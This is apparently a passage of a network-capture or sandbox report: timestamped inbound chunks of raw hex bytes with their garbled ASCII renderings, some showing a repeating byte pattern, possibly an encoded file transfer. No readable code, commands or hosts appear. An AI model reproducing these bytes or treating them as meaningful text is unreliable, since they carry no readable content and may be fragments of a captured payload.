2021-12-01 15:23:21 UTC	724	IN	Data Raw: 8f c0 1d af 44 d4 d4 48 2e 2f cf 6d 2d 2c 4a 95 3b b8 bc 19 39 f9 5a 1b 30 db a7 0f 9d 32 04 cc 68 94 eb 73 77 02 9a 46 82 3d 79 70 2c 3a 65 8b 3f eb ae af 69 e7 96 d5 5d 48 81 b9 d6 59 fa d3 37 39 7d bd 81 57 92 1e 02 f6 7f 63 4d 60 66 4f 82 bf af 13 3f e7 47 af 91 4f 96 28 f5 ba 1c be cb 35 e0 f9 e4 84 ad 1e 0a eb 79 b5 2b 41 88 3f eb b0 4d aa 49 37 76 a5 79 9c 78 11 df 55 29 c2 d9 5d 56 e4 1b 7e 0c 76 99 b5 e6 fd 1a 50 25 4c 62 c9 99 47 17 d6 6d 75 42 91 d8 f3 89 8a f5 20 a7 5f e5 d9 bb e2 33 28 f0 33 39 cf 98 df 7f 32 73 6b a9 14 8e f3 ac 9e 6f ad b2 47 7c e2 d7 80 5e db 9b 6b d5 65 b7 3d 02 76 1a 9f 5f 52 aa 97 53 44 4c 68 b6 2d 43 08 85 10 78 0d 6c c0 4e f5 78 ec de 0d e9 3f 43 09 38 a4 bf 2d 49 19 91 d3 7e 65 f0 f3 19 cf 01 f7 ec 95 b0 32 53 a5 01 Data Ascii: DH./m-,J;9Z02hswF=yp,:e?i]HY79}WcM`fO?GO(5y+A?MI7vyxU)]V~vP%LbGmuB _3(392skoG|^ke=v_RSDLh-CxlNx?C8-I~e2S
2021-12-01 15:23:21 UTC	728	IN	Data Raw: 39 7d f8 a8 30 f4 b0 20 92 41 09 e8 c7 4a 86 35 e0 a2 a9 68 4c 3a 60 d5 d2 bb 41 14 b2 8b 6a 54 76 15 06 f5 70 07 18 94 64 4f cc 40 16 e0 5d de c0 2e 37 a8 f9 7f 1a b5 ca fc b4 4c a9 26 97 67 f9 0b 64 c1 4c 6c 52 27 88 98 69 d5 af 89 45 d8 c9 0f 55 c2 47 fb d3 68 e9 c2 56 b3 0a 1e 1f fd 3e f2 97 7e d6 fc 36 92 e2 1e 9c 05 6f ce 40 5f 2c 10 bb 89 56 be 22 16 dd 00 89 62 d6 49 b9 75 2f cf f2 6c cc 0d fb 6d 4c 70 ff 5c e3 8f d0 ea b6 52 61 d0 a4 50 07 d7 5a 59 91 9c 65 e7 af 02 37 72 83 29 a4 3f bf cd 47 0a ee 64 e7 3b 70 16 19 2d 59 37 7a 96 42 fe e4 71 12 a4 8c 5e 19 10 a1 08 50 50 aa b7 66 51 88 19 21 9d a4 82 d7 16 64 50 6a 7a 75 32 e2 74 ce 27 5b bf cf 2e ab e5 ff dd 79 f8 e2 9b cd df 2a fc 38 cd 8c e4 a5 30 30 3c 3d 40 89 b1 01 5d dc dd 94 5c c6 61 a9 Data Ascii: 9}0 AJ5hL:`AjTvpdO@].7L&gdLlR'iEUGhV>~6o@_,V"bIu/lmLp\RaPZYe7r)?Gd;p-Y7zBq^PPfQ!dPjzu2t'[.y*800<=@]\a
2021-12-01 15:23:21 UTC	732	IN	Data Raw: c4 18 2a 20 6c 44 0b e8 0d 10 78 b3 88 e8 84 54 f1 66 70 53 4f d0 08 34 4c 9e c4 c7 e7 f7 e5 9f ef 18 bf ac 09 61 e2 2c e6 ea 0b a2 15 11 3d 61 f6 37 43 16 22 6e 5b 88 6b df ac c2 19 93 1e a1 3f f4 6d 2d 4c 9d ed bf 8e a4 a1 36 a3 8e b6 09 8f 3d 4e 16 21 ff 2d e5 9a e1 75 c0 67 e8 0b ef 71 4b c4 89 0f 55 8c 10 f5 3e 7f 15 58 14 22 5f 65 9c 74 dc cd c5 e7 ec 14 3b 68 d9 67 6d 5f 9a 74 24 56 6a 8a ec 99 ff 49 f9 35 03 5c d8 92 a2 1d ca 7c f1 3e a5 b2 3b d0 b3 f0 3a 7e bc 1c b4 16 0d 9a 2d fe d9 e6 6c 76 f7 ac 39 f2 98 18 6a da 32 67 aa 05 9b 9d 46 80 9d 60 62 e6 50 99 5d 2c 82 6f 62 db 9d 70 f6 e4 18 ac 4f 67 7c 87 aa df 82 b2 b5 df b4 77 31 0f 7e 8e 04 de ce 36 38 d6 6c 17 82 ae 69 2d 6e 2a 49 b0 9f db c8 5e 0d f8 0b 99 a0 8c be 02 a3 32 3d 65 34 3b 83 80 Data Ascii: * lDxTfpSO4La,=a7C"n[k?m-L6=N!-ugqKU>X"_et;hgm_t$VjI5\|>;:~-lv9j2gF`bP],obpOg|w1~68li-n*I^2=e4;
2021-12-01 15:23:21 UTC	736	IN	Data Raw: 07 07 92 11 d1 68 d2 be 4f 92 aa 17 39 b9 64 c6 40 be 79 02 62 eb 6f 86 02 bc f5 ef 0f 45 02 38 3d 7d 26 c3 12 22 7e 1c e2 13 f8 04 2b 11 ab 17 43 31 3e a7 9a 3a c6 c8 04 6a ee d9 31 b7 f8 93 5f 32 e9 9f 36 42 4a 71 37 68 72 15 58 28 c8 6f ac f6 f1 26 25 1f c0 1b 25 d2 2e 12 e6 fe a5 35 5c 4b 34 3e d9 9b dc 87 13 69 89 f4 6d 8c 43 50 4b f9 52 f1 1d 69 b5 92 14 ed 7f a2 85 ce 24 9e 6e 77 c2 ff fd 1e 98 15 ec a9 13 ce 72 52 24 7c 8d a1 9e d0 83 f3 f9 57 25 30 f0 80 f7 b1 93 58 0d 0c b4 b0 7d 45 4d bc 89 26 ac 4b 09 b8 17 24 4f e4 5a e0 6a 66 0d 77 a6 b5 8b a7 50 65 84 68 ff 0b 82 3d a4 cd 87 51 70 fc aa 76 a4 fa e1 36 92 07 48 b0 a2 35 87 a0 b6 78 79 bc 47 db 5b 58 7e 9c d5 17 3b cb 0a a2 00 d3 6d 4c 83 43 44 e9 12 9f a5 a6 07 96 a9 52 29 57 9c 11 9d 07 45 Data Ascii: hO9d@yboE8=}&"~+C1>:j1_26BJq7hrX(o&%%.5\K4>imCPKRi$nwrR$|W%0X}EM&K$OZjfwPeh=Qpv6H5xyG[X~;mLCDR)WE
2021-12-01 15:23:21 UTC	739	IN	Data Raw: ce e3 58 8e 08 38 3d d6 d2 22 1d 2b b7 3f 8b 7d d2 e6 e8 f1 3b 61 60 64 2e 84 c0 1d 90 7e 02 ff 3f 69 f8 f4 d0 83 b4 94 ef 7c 7c 7b a0 c3 68 7e ed c0 33 37 83 b4 cd 8a 8f e2 3b f5 0d 31 da c3 64 e2 84 54 a8 7b 42 7e 95 a2 70 ab 90 1c 65 6b 8a f2 05 8f 32 6f df a3 c5 f2 4f 89 92 9c 80 68 e1 9e 09 c4 23 1a bd f9 5a 31 9c 5c 67 1c 23 57 44 4c 91 05 4f e0 92 d0 42 34 a7 be 48 3b 05 29 f2 9c 82 d2 34 c4 40 de ab 90 65 ca 51 1c 2d 27 a7 31 f1 c7 73 ef ca ca 27 41 7f b0 ac 92 eb c4 b2 8a d8 d9 45 49 28 20 cd ab 24 0e 86 98 fa c1 1d 4b ec 40 8f 41 f3 bb 5c c5 c1 fa 56 b7 13 98 8d 0d a6 b5 2f c6 d6 22 89 a2 d1 26 c0 35 f4 5e 9c d3 c1 6a 32 9a e4 55 e5 bd bc 7e 0f 7e 3c db 58 5c 64 28 86 40 08 3e 10 14 e4 62 76 90 78 89 6d 6c ea 4f 59 7b ce 68 a7 04 8b 6a da 22 ab Data Ascii: X8="+?};a`d.~?i||{h~37;1dT{B~pek2oOh#Z1\g#WDLOB4H;)4@eQ-'1s'AEI( $K@A\V/"&5^j2U~~<X\d(@>bvxmlOY{hj"
2021-12-01 15:23:21 UTC	743	IN	Data Raw: b5 d0 32 a5 61 93 3f 2a 2f 1c dd b2 78 cd 57 36 30 1a d6 d4 52 a3 88 07 fc 17 25 0b e9 c1 48 43 bf fd 99 87 72 b7 3b 22 4b bc e3 5a 2a 3a 97 22 93 0f 6c ac 77 2c d9 7b 63 3d 61 65 57 3c 32 6e d2 3b 70 06 e7 26 12 4d 5b 04 6f 79 2b 40 b2 66 d6 b1 5f 4c ba 4e d0 97 4a 29 4e 4e 68 29 0c 5c 3c 77 29 e4 f6 b9 47 18 ec d6 67 7d 9d 99 4b 69 7d c6 25 01 3c fb 4f d8 79 37 36 78 34 63 e7 41 b6 0a 8a f6 92 7f 67 66 81 b5 b5 8a e0 16 30 e7 92 55 20 7e be 0e fb 42 f0 21 5b cc 3b 1b 08 8c 16 bf 48 9e e3 bf 54 9e 0d ef ca 02 8c a3 81 b0 79 e6 17 69 2b 7f f0 56 a8 93 d3 16 e8 a3 bc ca 01 ff 0d 55 65 84 ce 47 e9 33 0e 0a 06 e2 7c 36 0c 10 bf 0e 17 07 fc c6 29 61 df bb 2d 79 47 8a a6 9a f3 9e c9 38 d1 af 59 6b 1d 9f 74 89 d4 95 6d 63 b4 3b aa a9 d1 99 ad 8c 67 56 15 a8 ed Data Ascii: 2a?*/xW60R%HCr;"KZ*:"lw,{c=aeW<2n;p&M[oy+@f_LNJ)NNh)\<w)Gg}Ki}%<Oy76x4cAgf0U ~B![;HTyi+VUeG3|6)a-yG8Yktmc;gV
2021-12-01 15:23:21 UTC	747	IN	Data Raw: ce 2b b4 58 2b 94 78 b2 d3 ec 08 a8 c3 4b af 5d 56 76 54 79 f6 f9 65 bd e9 56 05 aa e2 87 3b a6 f4 75 6e c0 a4 60 5e 68 33 a3 6a ae 4f 30 6d c6 34 91 0a a4 f4 5d b9 65 de 0c 0b 28 de 74 05 75 ea 2b fc d5 15 40 6a 72 f1 07 84 70 a1 4e ec f3 f3 26 a3 45 16 7c bc 84 9f 1a 17 c7 23 fd f2 7d af 1a eb ee ce 18 8a a1 86 3b 06 de 5b 69 ac ad 02 d6 be 88 87 66 72 b8 01 10 c0 fb 97 9c bb 64 8c ca 71 a4 6b d2 c1 f8 01 f4 4f 11 22 d9 71 ff 0d 9e e7 95 e9 d4 6e 15 47 b3 40 4e 0a 52 2d cc bb 47 df ad f5 3c 95 c3 fc 51 a9 8d 3f ed b0 4c 8e e0 a8 48 34 c4 7f 70 97 9c 58 a7 c3 d6 aa df b2 a9 ed 43 2a 72 c0 25 45 d5 51 e0 26 8a fb 0e ea 9d a6 42 a2 fa ac a2 f8 04 a1 2b 7e ca cd be 4f 09 91 29 48 73 be 61 0b d1 52 1e fe d5 33 f2 4c 7c b5 f7 f7 98 a8 fb e7 c6 4a b7 09 24 3a Data Ascii: +X+xK]VvTyeV;un`^h3jO0m4]e(tu+@jrpN&E|#};[ifrdqkO"qnG@NR-G<Q?LH4pXC*r%EQ&B+~O)HsaR3L|J$:
2021-12-01 15:23:21 UTC	752	IN	Data Raw: fa 40 89 28 48 4d 1a fe 51 8e 29 88 71 5e bc 29 9e 6d e7 fc ab a6 f0 af 3b 02 8f 4d 2d b6 e1 f0 d5 2b ba a3 5e b1 c0 fc 3b fe b0 ee 7c 92 8b dc 66 ad f2 42 58 ad 1a 7e 7e 3a 06 19 10 52 cf a0 0b f0 3b 80 11 70 ce 3c 8e 0a ac ad c0 7c 14 f2 34 1d bd 2a 5f db 10 a0 15 5f 40 f0 64 a0 d7 97 1e eb a5 6b 35 ff d9 7d e9 df 38 0a 08 cb 79 9f db f0 2f 84 cc f7 d6 dd 50 a2 45 69 6c c9 2f ee c9 80 e3 98 4a b9 25 5c 0f 5b ff 00 1a bb 0f 96 bf 82 04 33 71 86 e9 68 a7 11 c3 00 84 8b f8 a4 8f 7d 99 8e 7e de f6 57 bb 50 8e cb 42 3e c2 78 d6 df 32 80 08 8c cc 35 9f c5 3b 60 27 23 e4 47 07 74 0b cc c1 11 f7 cf 2f 9b 74 78 f0 dc 2d 7d 4c a6 e6 99 86 95 2b 2c 8f 36 61 2f bc 0d e3 4a 57 87 24 7b 6c f9 f6 64 c9 a5 21 ec 8f f2 6f 40 f8 d8 9d 1b e8 9b 6b 3b 17 b2 c2 bc 89 0c 4d Data Ascii: @(HMQ)q^)m;M-+^;|fBX~~:R;p<|4*__@dk5}8y/PEil/J%\[3qh}~WPB>x25;`'#Gt/tx-}L+,6a/JW${ld!o@k;M
2021-12-01 15:23:21 UTC	756	IN	Data Raw: 18 76 39 ae 61 d4 dd 04 4b d4 e7 3f 30 c5 ed a5 e3 ef 00 31 ac c5 b9 7c 8a a3 9e 0c ae d7 b5 1d 8d 0b 13 42 da fb 90 ae 71 7a d5 60 c6 83 d0 c7 19 e5 fc db da 02 59 ff 34 b3 60 14 b6 28 7c 25 c3 e2 52 4e ee db e8 f2 2f 23 53 2f 70 56 ef 16 69 d9 a2 cb 6c 6e 59 69 4e d2 0a dd ea 6c 08 ed e2 a3 dc 9b e9 06 5c 5c cb 4a 0b 7a f2 46 a6 5a 12 ef da 03 5f 5c a8 5d a4 18 12 11 ec 19 de d2 6b ce 71 26 53 76 bd 32 7d 45 57 86 62 27 39 48 b6 c5 14 22 b1 53 14 68 37 d5 96 52 93 09 6c 7c 1d 0a 0f 3c ef 5f 52 98 1e 79 34 46 8e ac 7a b7 4b 37 73 81 60 dc 62 2b d1 3b ca 19 f1 08 b7 37 45 06 4f 54 97 93 ff be 88 4e a8 c5 40 b2 c7 78 50 06 00 fa 6b 13 07 df c7 6a da 28 59 cc 93 91 01 06 76 a3 3e 01 23 3c 37 a0 8b 58 10 82 cb 47 34 1c 21 da c8 5f ca 6e 26 aa 40 15 66 6b ac Data Ascii: v9aK?01|Bqz`Y4`(|%RN/#S/pVilnYiNl\\JzFZ_\]kq&Sv2}EWb'9H"Sh7Rl|<_Ry4FzK7s`b+;7EOTN@xPkj(Yv>#<7XG4!_n&@fk
2021-12-01 15:23:21 UTC	760	IN	Data Raw: fb 34 4f b2 79 20 eb ac 2f 33 fe 9d 13 4a 9d e1 9a 01 59 33 78 cf 7a 74 00 52 86 51 e6 31 36 20 02 3b 03 b5 92 76 48 eb a8 a5 f6 5a f2 bd ac 38 b0 a7 b4 db aa 69 5d bc 08 8b b8 58 51 7a 7a 8d 53 61 41 bd fe 5f 66 8d 44 06 b8 38 c2 fc 5a 2c 78 71 64 d0 0f 08 df bd a5 8a 28 ff 52 ec 79 c0 12 32 58 ba d9 b9 24 40 37 b1 55 7b 0a f1 7f c7 63 65 70 b1 c9 ca ee c9 16 44 eb 05 b2 b6 62 e7 c1 7a 51 94 2d ce 14 17 69 d7 aa 75 f9 00 b0 24 67 89 d3 73 c9 4a 67 29 34 d1 cd df d6 9f 43 26 5a 5b a1 24 47 9b e1 24 28 f3 a1 73 16 7e 6e 3c 7b 71 19 52 bc b1 b7 14 2b 32 1f 7c 0c 93 c7 11 55 d4 19 d5 54 f3 61 bb b3 90 a1 8e c4 89 b3 d6 05 90 9a a8 b8 30 69 e0 7f 1c ed d1 8e 31 df a5 cf 10 b3 0a b7 86 94 82 9a c2 b1 57 74 f9 3d 86 05 ff 6f 5c 6e d8 64 f9 50 9d 27 ca ee 71 0e Data Ascii: 4Oy /3JY3xztRQ16 ;vHZ8i]XQzzSaA_fD8Z,xqd(Ry2X$@7U{cepDbzQ-iu$gsJg)4C&Z[$G$(s~n<{qR+2|UTa0i1Wt=o\ndP'q
2021-12-01 15:23:21 UTC	764	IN	Data Raw: 3b 91 1b 5f e4 2f 4e ac 71 a5 59 30 52 26 5c 49 37 e4 e0 4e 63 e7 2d 78 08 15 5e 57 96 bc 2f 6f 9f 87 eb ee dc 44 1c b4 16 c9 7b e1 ac 46 0d 45 73 11 2a b0 6b 94 8d ef df 8d da a2 90 b8 70 96 15 12 e2 27 93 9f 20 b3 3c 85 a0 d5 37 8f 1e 57 27 9d 45 98 19 eb 5f 55 2a 88 13 21 e2 b6 9c 80 a3 e4 a2 52 fe e5 d9 70 87 a0 ac 1e 9f e0 0c 3c 43 9c 80 b0 71 21 4b 1f c9 92 79 b8 20 98 1c dd ee 00 9c 6f 81 3b 79 1d 06 51 e5 bb 72 f6 36 fb a3 cd 8e 98 13 e0 ab fd 8d 8f 63 77 9d cb e8 e2 ae 6e 2d f0 f8 2f cd d5 04 1a 9d 7a 26 76 4a e6 b1 cd 19 1b 54 32 a1 0f 73 5b d7 38 62 cf a7 d6 5f a6 f0 60 ac 40 d3 9a aa d0 3b 90 54 b2 cf ac d0 be fc b7 9b 9a e6 13 f3 88 69 46 2b fb 0b 12 31 1d d4 39 87 2b 59 17 b0 84 a2 25 8e 03 6c 4f d9 7a 56 c6 e7 71 d9 9e f0 7c b8 92 7e 41 17 Data Ascii: ;_/NqY0R&\I7Nc-x^W/oD{FEs*kp' <7W'E_U*!Rp<Cq!Ky o;yQr6cwn-/z&vJT2s[8b_`@;TiF+19+Y%lOzVq|~A
2021-12-01 15:23:21 UTC	768	IN	Data Raw: b9 f0 e4 aa 35 ed 51 ae 7e 88 ae 62 15 f8 9a e7 37 5b e4 21 f5 c4 39 eb 8e 27 15 e3 90 9e 06 95 0e 7f 5b 87 b3 99 47 5e b3 1a 38 4c 00 07 d0 66 cf 18 94 b3 0a 59 ed ba fa b9 af 3d 05 27 0a 21 e9 90 c6 d9 14 fb 9e 5c 64 88 4e d3 92 fd 46 cd 65 ff e9 cf 80 d8 c9 93 cf 09 88 0e 49 da 60 7a fc 87 27 25 c7 cf 74 37 dc 7a 16 73 a1 39 d7 2e ef 43 70 69 ef ee 21 14 0f 88 60 6c 82 bc 3d f6 5d ef b8 50 41 0d 12 86 a4 3b f7 2b 62 24 92 18 50 d8 88 c6 63 2b 90 12 23 b8 d3 c6 ee 43 70 c1 de d0 6f 65 b8 76 47 86 37 49 b2 0d fa 33 5b 8d c8 95 da 59 81 73 85 01 b6 fe 51 a6 6a 99 00 9b ab 41 f3 ec 31 5d 79 86 2a e0 b1 e2 c5 4a 24 de 55 c5 e4 f0 ef 3f d6 af 0b 8c 3f ed 96 08 41 f3 ea 90 95 2a 9c 0f d8 19 16 34 99 3c e8 70 f1 8c 34 19 6d d6 d7 ec 3c df 58 a3 72 3c 9e be 4f Data Ascii: 5Q~b7[!9'[G^8LfY='!\dNFeI`z'%t7zs9.Cpi!`l=]PA;+b$Pc+#CpoevG7I3[YsQjA1]y*J$U??A*4<p4m<Xr<O
2021-12-01 15:23:21 UTC	771	IN	Data Raw: c3 8d e1 c0 35 9a 77 50 6c 82 50 6d 73 e1 ad 79 0e cc 24 81 7c 7c 89 05 39 fc 34 cf ff 2d 1a 44 69 0f 36 85 3c f1 25 10 cc c5 d3 29 ad 1d 7a bb 3d cb 28 27 ba 33 fe ab d5 df 83 c0 8a dd d4 f2 1d b0 a8 5e 7e 8a be a5 89 7a fb 6b 89 51 89 97 07 3a 9e 6b e4 bd 98 da 6e bd 8f e8 de c5 89 be d8 b7 ad c3 5a b0 4a b7 78 7f 3b a3 54 dd 34 72 7c 7f e0 95 9d 91 69 99 5d e2 b6 c0 21 d0 7f 78 83 6b c6 a4 87 91 eb bd 0c 8f 05 e6 c6 5a bc ee d3 66 d1 2d 0e 26 52 82 12 06 76 03 6f cf 2a 96 c5 51 d4 a3 7e ee 46 22 34 61 91 74 51 c9 d9 28 63 da df 5d 68 16 b8 33 fb fd 69 de 80 7b 34 ce d8 49 8d d8 98 c3 6f 5e 70 8a f2 4d f6 d4 7f 86 7b ab a7 c6 a4 9b 28 65 95 68 6d aa 05 3e 68 9d 17 73 a2 3a b9 7f a3 e1 cf 35 5c b1 17 df b8 aa 22 c7 88 8f ae d5 30 f7 42 e5 b6 9e f2 fd 27 Data Ascii: 5wPlPmsy$||94-Di6<%)z=('3^~zkQ:knZJx;T4r|i]!xkZf-&Rvo*Q~F"4atQ(c]h3i{4Io^pM{(ehm>hs:5\"0B'
2021-12-01 15:23:21 UTC	775	IN	Data Raw: 4e f9 ff e8 1d ec 6a ac c8 96 10 4f 1e 1f 93 f9 8a 7c 24 05 23 f1 fb 9b d5 39 d8 c4 f7 fa 73 41 28 2e 00 8f 90 20 49 46 df e4 4a a6 4d 46 db d8 af 3c 27 ec 7e 77 a2 43 35 94 02 8d ee 14 25 de 66 88 69 33 84 63 62 92 72 c4 f7 fa 71 44 b2 d2 d1 56 81 e7 a8 c3 78 3c 32 64 e1 db c5 0a cc ef dc 54 fd 85 cc b8 f8 19 f3 ef 83 95 8a 60 94 05 46 d8 a9 56 db a4 48 a1 86 7e 77 d7 52 80 79 e3 c1 18 4e f9 aa e1 f1 da 9f 8d df e4 48 c3 16 72 9e 3b a2 1c 71 48 a1 a8 d5 2b 9c 4b 4d 4d 4c f4 65 6a d6 83 f7 a8 d2 ce cb 3d 99 88 69 33 84 27 d7 03 05 24 21 b0 96 34 2c 2a 35 20 2d ce 95 bb 5f 1e 64 9b a5 09 74 ff a8 ee 58 cd 0b 0b 0d 2d 97 d7 77 fe 2b bd 45 63 32 3f a9 3c 73 7d df db c0 db f7 ae e5 fb 9f d7 67 5f 20 42 ed e6 74 8f 82 54 cb 38 1a 1e 28 32 36 0d 0a a3 87 ce b7 Data Ascii: NjO|$#9sA(. IFJMF<'~wC5%fi3cbrqDVx<2dT`FVH~wRyNHr;qH+KMMLej=i3'$!4,*5 -_dtX-w+Ec2?<s}g_ BtT8(26
2021-12-01 15:23:21 UTC	779	IN	Data Raw: 69 06 ec 0c fb b7 27 d0 e6 3d f6 31 d8 8f c3 2a 46 ac 8c 44 87 ca d7 13 8d d0 e6 74 ff fb d1 1c 23 c6 cd 37 e7 d3 6d 73 7d bf 3b 95 d2 ce e1 b8 aa a7 ff a8 82 46 8c 52 aa f2 3b 9e 69 06 ec 0c fb b7 27 d0 e6 3d f6 31 d8 8f c3 2a 46 ac 8c 48 91 a6 7d e3 95 bd 36 07 6e d0 e6 69 64 a4 78 60 cd 12 0a eb a9 2d ce 85 aa a2 73 55 32 7a 0e 73 7d f2 3b 9f eb dc 04 88 31 ba af 33 dd e0 0e 6f 73 5d 46 f8 4a e3 95 bd 36 44 87 d6 f5 b6 a5 93 cd 3d f6 24 37 97 d7 16 14 6c eb 89 b4 d4 f0 45 0a 9f eb e5 9a 7f 9b e1 90 0d 7e 59 3c 2a 46 8f c3 0a f6 03 64 99 dc 4d 1e 6d 6e b7 27 fe 59 77 87 ec 2c 0a f6 15 92 40 7d da ff 9a 5f 07 6e b3 1d f0 36 20 2d c8 d2 eb a9 04 e7 9f ef 57 37 e5 15 3c 73 7f b9 e0 0e 00 dd 86 2c 4b 1d 42 82 22 33 d9 7c 11 a9 cc dc 04 e7 9f eb a9 00 39 ec Data Ascii: i'=1*FDt#7ms};FR;i'=1*FH}6nidx`-sU2zs};13os]FJ6D=$7lE~Y<*FdMmn'Yw,@}_n6 -W7<s,KB"3|9
2021-12-01 15:23:21 UTC	784	IN	Data Raw: 11 bb ba 9c 2b fa 52 99 da cd a9 36 8d 8c fd e4 b2 a9 9f d9 23 87 82 10 13 bf 3c 42 7b a0 ba 9e b9 1d 6a d7 bf 0a 32 6b a9 35 5e f9 74 ce 55 03 c8 e3 19 ad 7e 29 a8 b3 75 b3 79 bd 56 85 f6 74 a7 ce b5 13 dd b7 6f 42 aa b6 ad 3f ff ea 27 8f 3f cb a1 c0 4a a6 8d 8e ad 3e 90 76 e4 28 81 90 e2 23 15 a2 ef 83 3d c6 59 0c 6b 59 b0 a6 f5 f2 bf 0b 05 59 60 fd ea 17 af 23 81 90 76 34 73 4d 36 54 8b 89 94 60 d1 58 ad 0e 00 dd 72 fa 4f c3 45 35 16 2b 1d 99 0c c4 04 d8 32 65 9e 56 74 c0 02 dd 3e 47 bb 0e ac b3 91 f7 b7 18 75 bd 5e f7 a3 ca b7 18 45 35 ba 90 12 35 b2 a4 30 6a ce de 05 56 bc 8b bd 09 74 c1 bc 8a cf 5d b2 a5 0a c8 3e 46 68 df 4f 1d 0e 3e dc 3a ce df 17 a9 9c 5a 2a 78 99 e2 9f d5 fa 71 f8 74 9f d5 36 5a fe 67 63 6b 51 16 20 13 bd 08 dd b8 82 1c 07 50 b9 Data Ascii: +R6#<B{j2k5^tU~)uyVtoB?'?J>v(#=YkYY`#v4sM6T`XrOE5+2eVt>Gu^E550jVt]>FhO>:Z*xqt6ZgckQ P
2021-12-01 15:23:21 UTC	788	IN	Data Raw: c0 ed ae 91 c8 d2 87 c3 21 9e 5b 72 8e 34 3e 1d ca b8 aa 87 c1 2f ba db e2 76 57 51 67 28 24 5e 9e 19 fd bb 5f 1e 5c 8d be b9 2c 27 d3 09 00 b3 1d d6 90 23 d9 2f d3 6d 6e f0 5a d2 8f ed 9c 57 5b 24 59 4e c5 21 b0 ef d6 be dc 77 e8 4e e3 f2 5e 9a 5f 4b 19 dd fe 1c 5a db ca b2 ef d2 8e 33 9e 0e 65 08 f1 b8 aa fe 3c 38 01 2c 3e 14 49 73 18 4b 19 9c 64 96 2d 8b c0 db ca b9 49 64 98 3d 93 9f eb a9 04 e7 de 71 3d 93 b8 c6 ac da 8b dc 57 50 c0 ec 2c 4b 19 9c 08 9d 82 0c c9 67 36 14 6e 86 48 f0 36 01 33 b9 42 e3 dd e3 e6 72 96 16 14 0f 83 a5 bb 56 da 96 27 cb 0a 93 bf 5a ce 8c 53 6e f0 36 64 96 30 39 85 ec 55 42 ed ed ae 91 c8 d2 aa fe 2b a6 09 17 f2 49 7d d2 8e 35 83 c0 cc 9f eb a9 04 e7 de 7d f8 2f a5 bf 5e bc d5 17 e5 d9 7c 13 8d ff be d5 1b e7 fa 3b 90 23 c7 Data Ascii: ![r4>/vWQg($^_\,'#/mnZW[$YN!wN^_KZ3e<8,>IsKd-Id=q=WP,Kg6nH63BrV'ZSn6d09UB+I}5}/^|;#
2021-12-01 15:23:21 UTC	792	IN	Data Raw: 21 b1 30 55 32 5a 88 31 ee 31 d8 fa 79 8c 0a f6 73 7d a0 6f 43 fa b0 97 e7 60 32 5b 61 51 08 0e ff da df 74 00 22 cd 5e c8 2d 31 d8 cc dc 32 5a 88 31 ee 30 75 83 85 ab 29 c5 6a e7 bf 3a 4e a1 d0 e7 bf 3b f1 b8 aa 87 af 13 8d be 89 b4 a0 6e c0 be 89 b5 3a 6f 63 54 b7 26 2c 4a b6 a4 58 46 73 7c 33 dd b0 96 63 55 04 e7 a9 04 d7 77 b7 27 89 b4 96 54 8f c2 e3 94 70 f4 60 cc fc 55 12 0b 59 3d d6 74 5f ca 77 06 4c 1a be f8 ea 66 7c ec d3 60 6d ef 13 0c 5b c0 1e a9 a4 39 4c da 5f b4 5f 46 2c ca c7 ce f1 39 fc d5 62 93 dd c7 5f b4 5f 4e b0 17 87 2e 40 fc 44 06 fc 15 82 63 45 f5 3d f3 ad 0e 00 dd 6b 69 89 b4 4d 1e c5 4a 7b 91 25 ba 42 82 cf 63 b8 aa 6a e6 f0 36 89 b4 4d 1e c5 b5 dd 86 c1 40 90 46 61 50 48 91 25 ba 42 82 cf 63 b8 a8 6f 73 42 82 cf 63 b8 aa 6a e6 f0 Data Ascii: !0U2Z11ys}oC`2[aQt"^-12Z10u)j:N;n:ocT&,JXFs|3cUw'Tp`UY=t_wLf|`m[9L__F,9b__N.@DcE=kiMJ{%Bcj6M@FaPH%BcosBcj
2021-12-01 15:23:21 UTC	796	IN	Data Raw: 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 16 71 0e 72 9f b8 d8 9f 9f 98 33 ba ca a5 94 05 05 05 2d ce e1 90 55 cd a1 0f 7c 13 fa 20 63 31 Data Ascii: dw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kqr3-U| c1
2021-12-01 15:23:21 UTC	800	IN	Data Raw: b2 73 7d d7 39 b8 c2 cb 33 9d 8c 6c 14 f1 41 3f 13 de 09 35 94 4c f3 42 7c e9 a6 95 d2 aa c9 00 b5 2a 2c 0b 13 dd 79 72 03 3d 1e 7b 91 89 c2 c3 2d 16 9f 14 f1 41 a6 95 d2 aa f2 c3 2d 31 26 f9 74 17 68 1f 7d 67 b7 27 fe 0e 04 5f 6b e0 6a d6 0a 92 4b 58 cc 36 0c ae 51 1b 5e 36 9c 49 fc 54 ee 67 63 ed fd 87 56 c1 09 74 95 d2 81 a0 6e f0 21 09 98 d1 3d f6 17 d0 a0 0a 85 f8 25 de 6b 01 3f 90 03 0a 9d 85 ce 90 09 14 7c 74 bf 3b f1 b8 bd c9 ab f6 ba af 56 dc 69 07 2a 31 bc d6 81 d3 0d 1f c0 da bf 3b f1 b8 a5 05 96 aa 78 09 74 ff 89 d3 09 1f c0 fa 38 0d 1c 57 44 e3 d5 72 fa 4f 2e af ec d3 92 4b 6b 0e 64 bc df b9 1d 8b da 94 3b f1 b8 aa 8c c3 ba 50 5a be f5 a2 19 f8 18 6d 1f cf 20 45 7b f5 a0 1d c8 a3 8d f1 d8 89 d3 29 b3 75 f0 45 78 09 74 ff c0 41 ff 24 c8 d2 eb Data Ascii: s}93lA?5LB|*,yr={-A-1&th}g'_kjKX6Q^6ITgcVtn!=%k?|t;Vi*1;xt8WDrO.Kkd;PZm 